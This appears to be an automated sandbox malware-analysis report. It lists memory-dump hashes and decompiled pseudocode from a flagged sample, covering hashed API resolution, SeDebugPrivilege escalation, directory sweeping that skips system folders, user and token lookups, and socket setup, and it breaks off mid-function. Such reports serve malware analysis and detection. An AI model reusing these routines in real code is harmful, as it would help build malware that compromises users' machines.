                                              • Source File: 00000000.00000002.363085208.00000000017B0000.00000040.00000001.sdmp, Offset: 017B0000, based on PE: false
                                              Similarity
                                              • API ID: LongWindow
                                              • String ID:
                                              • API String ID: 1378638983-0
                                              • Opcode ID: f8208fdbbc711c00a742c650df94e9b3b0790267a4e5b5757b8f10de514b164f
                                              • Instruction ID: 3c67e196681be57c0b45a96f5e8e68663879d199d779ad2720e50f5988644d65
                                              • Opcode Fuzzy Hash: f8208fdbbc711c00a742c650df94e9b3b0790267a4e5b5757b8f10de514b164f
                                              • Instruction Fuzzy Hash: 3611E2B58042499FDB20CF99D988BDEFBF8EB49724F20851AE955A7340C374A944CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%


                                              Memory Dump Source
                                              • Source File: 00000000.00000002.362848068.000000000172D000.00000040.00000001.sdmp, Offset: 0172D000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6f2164aac52e5a4f6a7680a53269498cc75e1f34bdd9858cea068968916b4300
                                              • Instruction ID: bd0d452117c6eb3f3fb702070ce4d35b04e2b19ce8289d6cb9cc18afd7836f6d
                                              • Opcode Fuzzy Hash: 6f2164aac52e5a4f6a7680a53269498cc75e1f34bdd9858cea068968916b4300
                                              • Instruction Fuzzy Hash: 4511BB75504280CFCB22CF54D5D4B15FBA1FB88324F28C6AAD8494B666C33AD44BCBA2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.369889414.0000000007AC0000.00000040.00000001.sdmp, Offset: 07AC0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d54d2f7b807cae54a75f9ead9cf1ffec314e5a13c32d0eb24ae8b254749ff88b
                                              • Instruction ID: 87f748909a6280e608edec33aa308307db193654525a6eda9a43ca40549d2523
                                              • Opcode Fuzzy Hash: d54d2f7b807cae54a75f9ead9cf1ffec314e5a13c32d0eb24ae8b254749ff88b
                                              • Instruction Fuzzy Hash: EC11BF72C0074BEACB11DBB9C8400DEFBB4EE86320B11865EE568B7100E770A6C5CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.369889414.0000000007AC0000.00000040.00000001.sdmp, Offset: 07AC0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 92d11715cdf332b571a4b7d6045b1609ca0e364688f724722ebf48780661a952
                                              • Instruction ID: 2a69591d2748331f328b8bec37b3ea3c76799bb05cdf12bb2dffe6a2540c0066
                                              • Opcode Fuzzy Hash: 92d11715cdf332b571a4b7d6045b1609ca0e364688f724722ebf48780661a952
                                              • Instruction Fuzzy Hash: A101B5F1B0025AEB8B14DB59DD808FFBBB9EFC5150B14452EE824D7351DA308A45C7E2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.369889414.0000000007AC0000.00000040.00000001.sdmp, Offset: 07AC0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b82798e9c8d9d1656b118c2b18f416c2b3745d71282ba964dc9420a4e950178e
                                              • Instruction ID: 0ec8205d47f17da2142e002f10b3ced5846a0f11786f69163373a3390e3a9f39
                                              • Opcode Fuzzy Hash: b82798e9c8d9d1656b118c2b18f416c2b3745d71282ba964dc9420a4e950178e
                                              • Instruction Fuzzy Hash: D41190B4B09149EFD700D764C10926DF6A3AF86300F20C46AD4265B789CB34DC16CBA2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.369889414.0000000007AC0000.00000040.00000001.sdmp, Offset: 07AC0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1093dcbb940d450461855e755dc0df91d47a2f5d84cc1f28beceb578b605be69
                                              • Instruction ID: 2441ea9e4b193dea53cd53e8d89855104e5f2b575c887bd6bbadd8c794217f96
                                              • Opcode Fuzzy Hash: 1093dcbb940d450461855e755dc0df91d47a2f5d84cc1f28beceb578b605be69
                                              • Instruction Fuzzy Hash: F41125B6D0520AEBCF06CFA4C485AEEBBB5BB49300F10406AD825B3340D7345945CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.362799857.000000000171D000.00000040.00000001.sdmp, Offset: 0171D000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 72943656679ffca1083b22ece3ec554687a61077dd45e180f955b28843c36ca5
                                              • Instruction ID: 11b47d31fc6be8318f333f0040acbd386df0ad0d4c26976a141a899f7d7b463e
                                              • Opcode Fuzzy Hash: 72943656679ffca1083b22ece3ec554687a61077dd45e180f955b28843c36ca5
                                              • Instruction Fuzzy Hash: C401A77140D3809EE7308B5DC888767FBD8EF41764F18C559EE185B28AC7789444CEB1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.369889414.0000000007AC0000.00000040.00000001.sdmp, Offset: 07AC0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1664a2dc332cf62c860371d8c5d45e729cf7bb3d2b4aad7095e9a94bcaae7555
                                              • Instruction ID: 2055207d6c9a1fc6dd3499df6679b7bd391e638a9d7f02f6a074408d13692c8b
                                              • Opcode Fuzzy Hash: 1664a2dc332cf62c860371d8c5d45e729cf7bb3d2b4aad7095e9a94bcaae7555
                                              • Instruction Fuzzy Hash: 4201CCF1800219EFDB14DF69C8057EFBBF5BB45354F158119E434AA290D7744A81CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.369889414.0000000007AC0000.00000040.00000001.sdmp, Offset: 07AC0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5636f9aa9396677f00c42941bcafd314bbc225c5d39f5357839c153d72b716a5
                                              • Instruction ID: 94d82d97446734aae87f1898fc6dec827c54f3aaf393fb2b423551ef40ad423b
                                              • Opcode Fuzzy Hash: 5636f9aa9396677f00c42941bcafd314bbc225c5d39f5357839c153d72b716a5
                                              • Instruction Fuzzy Hash: F4F0E26201E3D5AFC34387605CA04A27FB46E1312038F45DBD190CF0B3D218495AD763
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.369889414.0000000007AC0000.00000040.00000001.sdmp, Offset: 07AC0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 51d4dd82a386b555157d81a3018bde60dbcf613b6405d1b0a3b92d382da3edb6
                                              • Instruction ID: 4cb47f971caaf564a6dcbf8f81ba2c33afd98dfa8caffa2ccf9de97b2b6a3956
                                              • Opcode Fuzzy Hash: 51d4dd82a386b555157d81a3018bde60dbcf613b6405d1b0a3b92d382da3edb6
                                              • Instruction Fuzzy Hash: 1DF0B4B67082956F9304C7699C84C6BBFE9EBCA22431580BAE448DB355CA309C00C360
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.369889414.0000000007AC0000.00000040.00000001.sdmp, Offset: 07AC0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: df31d80c0989996ab5854202e8aaff1bfa19ddf8a04ab6ee96dfe1b377e5c86b
                                              • Instruction ID: aed940f10339e493342b559d9fdcc7a00d8a971f43ce58b44cf9fc75f4cefe28
                                              • Opcode Fuzzy Hash: df31d80c0989996ab5854202e8aaff1bfa19ddf8a04ab6ee96dfe1b377e5c86b
                                              • Instruction Fuzzy Hash: BA0129B0D0110ADFCB40EFA8D5446AEFBB1FF48204F1186AAD819A7354DB705E41CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.362799857.000000000171D000.00000040.00000001.sdmp, Offset: 0171D000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6f434b2f28de44a29632f11a0ddde1da13a74be2ddeff2b991543f0a927f9d06
                                              • Instruction ID: e293d842c0378520a406a4c2396e4cad58acc8b9f917d55176e3deab0649775e
                                              • Opcode Fuzzy Hash: 6f434b2f28de44a29632f11a0ddde1da13a74be2ddeff2b991543f0a927f9d06
                                              • Instruction Fuzzy Hash: A0F096714083849EE7218E59CCC8B63FFD8EB81734F18C55AED085B28AC3789844CEB1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.369889414.0000000007AC0000.00000040.00000001.sdmp, Offset: 07AC0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f574872d75b818a20312301c695d8729d0d84509fa0efac91186ac5822bb8f6a
                                              • Instruction ID: 806aa863b946333f16a8f6b29077b3cf21ea039bd6b0a0556a8a2fd82f443322
                                              • Opcode Fuzzy Hash: f574872d75b818a20312301c695d8729d0d84509fa0efac91186ac5822bb8f6a
                                              • Instruction Fuzzy Hash: 4B01BFB0800219EFDB14DF59C8047AFBAF5FF45354F148529E434AA190D7744A44CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.369889414.0000000007AC0000.00000040.00000001.sdmp, Offset: 07AC0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d04053e96daaa8f243e94f35b568a5daf52f8079766dff36d9401796ffb9d494
                                              • Instruction ID: 8ad218e544bcafa73e6bd50674eb3baf09b9a22df7b0eece5a029b1dc3d86ded
                                              • Opcode Fuzzy Hash: d04053e96daaa8f243e94f35b568a5daf52f8079766dff36d9401796ffb9d494
                                              • Instruction Fuzzy Hash: 9CE03976B041286F5304DA6ED884C6BBBEEEBCD674351813AF508DB314DA309C0086A0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.369889414.0000000007AC0000.00000040.00000001.sdmp, Offset: 07AC0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d37f5bab8aff10074304da26567c38a7f5ce27634f12ef567ed0ffcb3fcc8fe3
                                              • Instruction ID: 2bedb92c6305ae3d807a9fee4d6495eb5ba05f93b67c2fa17a6f21b3bf694c91
                                              • Opcode Fuzzy Hash: d37f5bab8aff10074304da26567c38a7f5ce27634f12ef567ed0ffcb3fcc8fe3
                                              • Instruction Fuzzy Hash: CCD05E32B180648B4A5AB17864111AEA3D797C98A8361007AC21ED7749DE319C6743D2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.369889414.0000000007AC0000.00000040.00000001.sdmp, Offset: 07AC0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 41e61309a9c4af1447d6ecddd3f38770993604347dd3654da87a02dad1304643
                                              • Instruction ID: 1e73af6d65c306d6530715d4ec748f2778abaa8406c19810b16ce8e0aa60480b
                                              • Opcode Fuzzy Hash: 41e61309a9c4af1447d6ecddd3f38770993604347dd3654da87a02dad1304643
                                              • Instruction Fuzzy Hash: 49D05EF1008280FECB13D7608E5084B3F619F0318170A849FD1699E1A3CA24842A9663
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.369889414.0000000007AC0000.00000040.00000001.sdmp, Offset: 07AC0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fc8c9303b2b14cd378006625d93b2508fb637f96e533be8e6ac29e01c438c34e
                                              • Instruction ID: 5aeaa5800c3c2d0b58d6b13e69f66540c7fbfc7ce22e63913f16484fe925d042
                                              • Opcode Fuzzy Hash: fc8c9303b2b14cd378006625d93b2508fb637f96e533be8e6ac29e01c438c34e
                                              • Instruction Fuzzy Hash: 17E01AB4904219CFCB50CFA4C8456ACBBB0FB49360F108359D565E32D4CF3019418F00
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Executed Functions

                                              C-Code - Quality: 85%
                                              			E00403D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                              				struct _WIN32_FIND_DATAW _v596;
                                              				void* __ebx;
                                              				void* _t35;
                                              				int _t43;
                                              				void* _t52;
                                              				int _t56;
                                              				intOrPtr _t60;
                                              				void* _t66;
                                              				void* _t73;
                                              				void* _t74;
                                              				WCHAR* _t98;
                                              				void* _t99;
                                              				void* _t100;
                                              				void* _t101;
                                              				WCHAR* _t102;
                                              				void* _t103;
                                              				void* _t104;
                                              
                                              				L004067C4(0xa); // executed
                                              				_t72 = 0;
                                              				_t100 = 0x2e;
                                              				_t106 = _a16;
                                              				if(_a16 == 0) {
                                              					L15:
                                              					_push(_a8);
                                              					_t98 = E00405B6F(0, L"%s\\%s", _a4);
                                              					_t104 = _t103 + 0xc;
                                              					if(_t98 == 0) {
                                              						L30:
                                              						__eflags = 0;
                                              						return 0;
                                              					}
                                              					E004031E5(_t72, _t72, 0xd4f4acea, _t72, _t72);
                                              					_t35 = FindFirstFileW(_t98,  &_v596); // executed
                                              					_t73 = _t35;
                                              					if(_t73 == 0xffffffff) {
                                              						L29:
                                              						E00402BAB(_t98);
                                              						goto L30;
                                              					}
                                              					L17:
                                              					while(1) {
                                              						if(E00405D24( &(_v596.cFileName)) >= 3 || _v596.cFileName != _t100) {
                                              							if(_v596.dwFileAttributes != 0x10) {
                                              								L21:
                                              								_push( &(_v596.cFileName));
                                              								_t101 = E00405B6F(_t124, L"%s\\%s", _a4);
                                              								_t104 = _t104 + 0xc;
                                              								if(_t101 == 0) {
                                              									goto L24;
                                              								}
                                              								if(_a12 == 0) {
                                              									E00402BAB(_t98);
                                              									E00403BEF(_t73);
                                              									return _t101;
                                              								}
                                              								_a12(_t101);
                                              								E00402BAB(_t101);
                                              								goto L24;
                                              							}
                                              							_t124 = _a20;
                                              							if(_a20 == 0) {
                                              								goto L24;
                                              							}
                                              							goto L21;
                                              						} else {
                                              							L24:
                                              							E004031E5(_t73, 0, 0xce4477cc, 0, 0);
                                              							_t43 = FindNextFileW(_t73,  &_v596); // executed
                                              							if(_t43 == 0) {
                                              								E00403BEF(_t73); // executed
                                              								goto L29;
                                              							}
                                              							_t100 = 0x2e;
                                              							continue;
                                              						}
                                              					}
                                              				}
                                              				_t102 = E00405B6F(_t106, L"%s\\*", _a4);
                                              				if(_t102 == 0) {
                                              					L14:
                                              					_t100 = 0x2e;
                                              					goto L15;
                                              				}
                                              				E004031E5(0, 0, 0xd4f4acea, 0, 0);
                                              				_t52 = FindFirstFileW(_t102,  &_v596); // executed
                                              				_t74 = _t52;
                                              				if(_t74 == 0xffffffff) {
                                              					L13:
                                              					E00402BAB(_t102);
                                              					_t72 = 0;
                                              					goto L14;
                                              				} else {
                                              					goto L3;
                                              				}
                                              				do {
                                              					L3:
                                              					if((_v596.dwFileAttributes & 0x00000010) == 0) {
                                              						goto L11;
                                              					}
                                              					if(_a24 == 0) {
                                              						L7:
                                              						if(E00405D24( &(_v596.cFileName)) >= 3) {
                                              							L9:
                                              							_push( &(_v596.cFileName));
                                              							_t60 = E00405B6F(_t114, L"%s\\%s", _a4);
                                              							_t103 = _t103 + 0xc;
                                              							_a16 = _t60;
                                              							_t115 = _t60;
                                              							if(_t60 == 0) {
                                              								goto L11;
                                              							}
                                              							_t99 = E00403D74(_t115, _t60, _a8, _a12, 1, 0, 1);
                                              							E00402BAB(_a16);
                                              							_t103 = _t103 + 0x1c;
                                              							if(_t99 != 0) {
                                              								E00402BAB(_t102);
                                              								E00403BEF(_t74);
                                              								return _t99;
                                              							}
                                              							goto L11;
                                              						}
                                              						_t66 = 0x2e;
                                              						_t114 = _v596.cFileName - _t66;
                                              						if(_v596.cFileName == _t66) {
                                              							goto L11;
                                              						}
                                              						goto L9;
                                              					}
                                              					_push(L"Windows");
                                              					if(E00405EFF( &(_v596.cFileName)) != 0) {
                                              						goto L11;
                                              					}
                                              					_push(L"Program Files");
                                              					if(E00405EFF( &(_v596.cFileName)) != 0) {
                                              						goto L11;
                                              					}
                                              					goto L7;
                                              					L11:
                                              					E004031E5(_t74, 0, 0xce4477cc, 0, 0);
                                              					_t56 = FindNextFileW(_t74,  &_v596); // executed
                                              				} while (_t56 != 0);
                                              				E00403BEF(_t74); // executed
                                              				goto L13;
                                              			}


                                              APIs
                                              • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                                              • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                                              • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                                              • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: FileFind$FirstNext
                                              • String ID: %s\%s$%s\*$Program Files$Windows
                                              • API String ID: 1690352074-2009209621
                                              • Opcode ID: 5c3a63efb33a22a8ff96110af9ee72305a9759e4f5ebb0566404c2b67a58fd17
                                              • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                                              • Opcode Fuzzy Hash: 5c3a63efb33a22a8ff96110af9ee72305a9759e4f5ebb0566404c2b67a58fd17
                                              • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 78%
                                              			E0040650A(void* __eax, void* __ebx, void* __eflags) {
                                              				void* _v8;
                                              				struct _LUID _v16;
                                              				intOrPtr _v20;
                                              				intOrPtr _v24;
                                              				struct _TOKEN_PRIVILEGES _v32;
                                              				intOrPtr* _t13;
                                              				void* _t14;
                                              				int _t16;
                                              				int _t31;
                                              				void* _t32;
                                              
                                              				_t31 = 0;
                                              				E004060AC();
                                              				_t32 = __eax;
                                              				_t13 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
                                              				_t14 =  *_t13(_t32, 0x28,  &_v8);
                                              				if(_t14 != 0) {
                                              					E004031E5(__ebx, 9, 0xc6c3ecbb, 0, 0);
                                              					_t16 = LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16); // executed
                                              					if(_t16 != 0) {
                                              						_push(__ebx);
                                              						_v32.Privileges = _v16.LowPart;
                                              						_v32.PrivilegeCount = 1;
                                              						_v24 = _v16.HighPart;
                                              						_v20 = 2;
                                              						E004031E5(1, 9, 0xc1642df2, 0, 0);
                                              						AdjustTokenPrivileges(_v8, 0,  &_v32, 0x10, 0, 0); // executed
                                              						_t31 =  !=  ? 1 : 0;
                                              					}
                                              					E00403C40(_v8);
                                              					return _t31;
                                              				}
                                              				return _t14;
                                              			}


                                              APIs
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                                              • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                              • String ID: SeDebugPrivilege
                                              • API String ID: 3615134276-2896544425
                                              • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                              • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                                              • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                              • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00402B7C(long _a4) {
                                              				void* _t4;
                                              				void* _t7;
                                              
                                              				_t4 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
                                              				_t7 = _t4;
                                              				if(_t7 != 0) {
                                              					E00402B4E(_t7, 0, _a4);
                                              				}
                                              				return _t7;
                                              			}


                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                              • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocateProcess
                                              • String ID:
                                              • API String ID: 1357844191-0
                                              • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                              • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                                              • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                              • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00406069(WCHAR* _a4, DWORD* _a8) {
                                              				int _t4;
                                              				void* _t5;
                                              
                                              				E004031E5(_t5, 9, 0xd4449184, 0, 0);
                                              				_t4 = GetUserNameW(_a4, _a8); // executed
                                              				return _t4;
                                              			}


                                              APIs
                                              • GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: NameUser
                                              • String ID:
                                              • API String ID: 2645101109-0
                                              • Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                                              • Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
                                              • Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                                              • Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: recv
                                              • String ID:
                                              • API String ID: 1507349165-0
                                              • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                              • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                                              • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                              • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 75%
                                              			E004061C3(void* __eax, void* __ebx, void* __eflags) {
                                              				int _v8;
                                              				long _v12;
                                              				int _v16;
                                              				int _v20;
                                              				char _v24;
                                              				char _v28;
                                              				char _v32;
                                              				intOrPtr* _t25;
                                              				int _t27;
                                              				int _t30;
                                              				int _t31;
                                              				int _t36;
                                              				int _t37;
                                              				intOrPtr* _t39;
                                              				int _t40;
                                              				long _t44;
                                              				intOrPtr* _t45;
                                              				int _t46;
                                              				void* _t48;
                                              				int _t49;
                                              				void* _t67;
                                              				void* _t68;
                                              				void* _t74;
                                              
                                              				_t48 = __ebx;
                                              				_t67 = 0;
                                              				_v8 = 0;
                                              				E00402BF2();
                                              				_t68 = __eax;
                                              				_t25 = E004031E5(__ebx, 9, 0xe87a9e93, 0, 0);
                                              				_t2 =  &_v8; // 0x414449
                                              				_push(1);
                                              				_push(8);
                                              				_push(_t68);
                                              				if( *_t25() != 0) {
                                              					L4:
                                              					_t27 = E00402B7C(0x208);
                                              					_v20 = _t27;
                                              					__eflags = _t27;
                                              					if(_t27 != 0) {
                                              						E0040338C(_t27, _t67, 0x104);
                                              						_t74 = _t74 + 0xc;
                                              					}
                                              					_push(_t48);
                                              					_t49 = E00402B7C(0x208);
                                              					__eflags = _t49;
                                              					if(_t49 != 0) {
                                              						E0040338C(_t49, _t67, 0x104);
                                              						_t74 = _t74 + 0xc;
                                              					}
                                              					_v28 = 0x208;
                                              					_v24 = 0x208;
                                              					_t7 =  &_v8; // 0x414449
                                              					_v12 = _t67;
                                              					E004031E5(_t49, 9, 0xecae3497, _t67, _t67);
                                              					_t30 = GetTokenInformation( *_t7, 1, _t67, _t67,  &_v12); // executed
                                              					__eflags = _t30;
                                              					if(_t30 == 0) {
                                              						_t36 = E00402B7C(_v12);
                                              						_v16 = _t36;
                                              						__eflags = _t36;
                                              						if(_t36 != 0) {
                                              							_t14 =  &_v8; // 0x414449, executed
                                              							_t37 = E00406086( *_t14, 1, _t36, _v12,  &_v12); // executed
                                              							__eflags = _t37;
                                              							if(_t37 != 0) {
                                              								_t39 = E004031E5(_t49, 9, 0xc0862e2b, _t67, _t67);
                                              								_t40 =  *_t39(_t67,  *_v16, _v20,  &_v28, _t49,  &_v24,  &_v32); // executed
                                              								__eflags = _t40;
                                              								if(__eflags != 0) {
                                              									_t67 = E00405B6F(__eflags, L"%s", _t49);
                                              								}
                                              							}
                                              							E00402BAB(_v16);
                                              						}
                                              					}
                                              					__eflags = _v8;
                                              					if(_v8 != 0) {
                                              						E00403C40(_v8); // executed
                                              					}
                                              					__eflags = _t49;
                                              					if(_t49 != 0) {
                                              						E00402BAB(_t49);
                                              					}
                                              					_t31 = _v20;
                                              					__eflags = _t31;
                                              					if(_t31 != 0) {
                                              						E00402BAB(_t31);
                                              					}
                                              					return _t67;
                                              				}
                                              				_t44 = GetLastError();
                                              				if(_t44 == 0x3f0) {
                                              					E004060AC();
                                              					_t45 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
                                              					_t3 =  &_v8; // 0x414449
                                              					_t46 =  *_t45(_t44, 8, _t3);
                                              					__eflags = _t46;
                                              					if(_t46 == 0) {
                                              						goto L2;
                                              					}
                                              					goto L4;
                                              				}
                                              				L2:
                                              				return 0;
                                              			}



























                                              APIs
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                                              • _wmemset.LIBCMT ref: 00406244
                                              • _wmemset.LIBCMT ref: 00406261
                                              • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: _wmemset$ErrorInformationLastToken
                                              • String ID: IDA$IDA
                                              • API String ID: 487585393-2020647798
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 37%
                                              			E00404E17(intOrPtr _a4, intOrPtr _a8) {
                                              				signed int _v8;
                                              				intOrPtr _v28;
                                              				intOrPtr _v32;
                                              				intOrPtr _v36;
                                              				void _v40;
                                              				void* _t23;
                                              				signed int _t24;
                                              				signed int* _t25;
                                              				signed int _t30;
                                              				signed int _t31;
                                              				signed int _t33;
                                              				signed int _t41;
                                              				void* _t42;
                                              				signed int* _t43;
                                              
                                              				_v8 = _v8 & 0x00000000;
                                              				_t33 = 8;
                                              				memset( &_v40, 0, _t33 << 2);
                                              				_v32 = 1;
                                              				_t23 =  &_v40;
                                              				_v28 = 6;
                                              				_v36 = 2;
                                              				__imp__getaddrinfo(_a4, _a8, _t23,  &_v8); // executed
                                              				if(_t23 == 0) {
                                              					_t24 = E00402B7C(4);
                                              					_t43 = _t24;
                                              					_t31 = _t30 | 0xffffffff;
                                              					 *_t43 = _t31;
                                              					_t41 = _v8;
                                              					__imp__#23( *((intOrPtr*)(_t41 + 4)),  *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t42, _t30); // executed
                                              					 *_t43 = _t24;
                                              					if(_t24 != _t31) {
                                              						__imp__#4(_t24,  *((intOrPtr*)(_t41 + 0x18)),  *((intOrPtr*)(_t41 + 0x10))); // executed
                                              						if(_t24 == _t31) {
